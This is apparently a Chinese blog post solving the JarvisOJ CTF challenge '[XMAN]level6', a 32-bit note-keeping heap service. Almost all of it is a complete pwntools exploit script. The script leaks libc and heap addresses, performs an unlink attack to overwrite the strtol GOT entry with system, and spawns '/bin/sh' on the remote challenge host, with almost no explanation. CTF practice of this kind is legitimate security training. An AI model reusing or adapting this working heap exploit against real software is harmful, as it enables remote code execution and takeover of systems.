[XMAN]level6

nc pwn2.jarvisoj.com 9885

 

 

Hint1: 本题附件已更新,请大家重新下载以免影响解题。

 

level6.rar.69c5609dc9bab6c458b9c70d23e9445d

 

之前的guestbook2的32位版本

exp如下:

from pwn import *

def list_note():
    io.recvuntil('Your choice: ')
    io.sendline('1')

def new_note(note):
    io.recvuntil('Your choice: ')
    io.sendline('2')
    io.recvuntil('Length of new note: ')
    io.sendline(str(len(note)))
    io.recvuntil('Enter your note: ')
    io.send(note)

def edit_note(number, note):
    io.recvuntil('Your choice: ')
    io.sendline('3')
    io.recvuntil('Note number: ')
    io.sendline(str(number))
    io.recvuntil('Length of note: ')
    io.sendline(str(len(note)))
    io.recvuntil('Enter your note: ')
    io.send(note)

def delete_note(number):
    io.recvuntil('Your choice: ')
    io.sendline('4')
    io.recvuntil('Note number: ')
    io.sendline(str(number))

#io = process('./freenote_x86')
#io = gdb.debug('./freenote_x86', 'b *0x8048760')
io = remote('pwn2.jarvisoj.com', 9885)
elf = ELF('./freenote_x86')
#libc = elf.libc
libc = ELF('./libc-2.19.so')
strtol_got = 0x804A2BC

new_note(b'a' * 128)
new_note(b'b' * 128)
new_note(b'c' * 128)
new_note(b'd' * 128)
new_note(b'e' * 128)
delete_note(1)
delete_note(3)
edit_note(0, b'a' * 128 + b'b' * 8)
list_note()
io.recvuntil('b' * 8)
libc_addr = u32(io.recv(4))
info("libc_addr:" + str(hex(libc_addr)))
#libc_base = libc_addr - 0x1B3780 - 48
libc_base = libc_addr - 0x1AD420 - 48
info("libc_base:" + str(hex(libc_base)))
system_addr = libc_base + libc.symbols['system']
info("system_addr:" + str(hex(system_addr)))
edit_note(0, b'a' * 128 + b'b' * 12)
list_note()
io.recvuntil('b' * 12)
heap_addr = u32(io.recv(4))
info("heap_addr:" + str(hex(heap_addr)))
heap_base = heap_addr - 0xdb0
info("heap_base:" + str(hex(heap_base)))

unlink_addr = heap_base + 0x18
info("unlink_addr:" + str(hex(unlink_addr)))
payload = p32(0x88) + p32(0x80) + p32(unlink_addr - 12) + p32(unlink_addr - 8)
payload = payload.ljust(0x80, b'\x00')
payload += p32(0x80) + p32(0x88)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
delete_note(1)

payload = p32(2) + p32(1) + p32(0x100) + p32(heap_addr + 0xc) + p32(1) + p32(4) + p32(strtol_got)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
edit_note(1, p32(system_addr))

io.recvuntil('Your choice: ')
io.sendline('/bin/sh')

io.interactive()

 

上一篇:【山大智云开发日志】seafdav分析(12)


下一篇:PyQt5基础学习-QTreeWidget().selectedItem().parent().removeChild(删除当前所选的节点)